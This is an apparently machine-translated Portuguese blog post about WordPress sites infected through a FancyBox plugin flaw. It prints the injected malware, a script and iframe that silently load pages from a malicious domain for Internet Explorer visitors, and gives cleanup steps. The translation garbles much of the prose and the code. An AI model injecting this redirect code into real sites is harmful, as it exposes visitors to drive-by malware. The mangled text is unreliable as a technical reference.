[iframe Malware 203koko] Malware sites WordPress Infected

No início desta semana uma série de sites e blogs WordPressTer recebido advertências infecção por malware através Google Webmasters.

O problema a que Google Webmasters referido é a presença de um código / escrita malware de iframe os sites de origem.

<script> if (navigator.userAgent.match (/ msie / i)) {document.write ('<iframe src = "http: /2000koko.eu/hjnfh/ipframe2000.php "width =" 203 "height =" 2 "> </ iframe> </ div> '); } </ Script>

Parece que é um vulnerabilidade a plug-inacervoFancyBox para WordPress que até ontem (05.02.2015) não tinha sido atualizado por um longo tempo.
Resolver este problema e desinfecção de vírus locais com este malware, é relativamente simples.
1. Desativar local FancyBox plugn.
2. Exclua todos os arquivos do plug-in do FancyBox do servidor (via FTP)
3. Instale a nova versão do plugin (FancyBox 3.0.4)

FancyBox para WordPress 3.0.4

- Renomeado a configuração afetado pelo problema de segurança mencionado no 3.0.3. Isso não deve parar o código malicioso de aparecer em locais onde são o plugin é atualizado sem remover o código malicioso.

FancyBox para WordPress 3.0.3

-Corrigido um problema de segurança.

Malware Info:

TIPO: Iframe redirecionamento
TARGET: FancyBox WordPress
DOMÍNIO malware: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
RAW código de malware: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = altura "20" = "30"> </ iframe>
MALWARE SCRIPT: <script> if (navigator.userAgent.match / / i) (MSIE) {document.write ('<div style = "position: absolute; left: -2000px; width: 2000px">

Remover malware do seu site WordPress.

[iframe Malware 203koko] Malware sites WordPress Infected

Sobre o autor

Discrição LP

Fundador e editor Opções de invisibilidadeNa data 2006.
Experiência em sistemas Linux operacionais (especialmente CentOS), Mac OS X, Windows XP> Windows 10 e WordPress (CMS).

Deixe um comentário

Este site usa o Akismet para reduzir o spam. Saiba como seus dados de comentário são processados.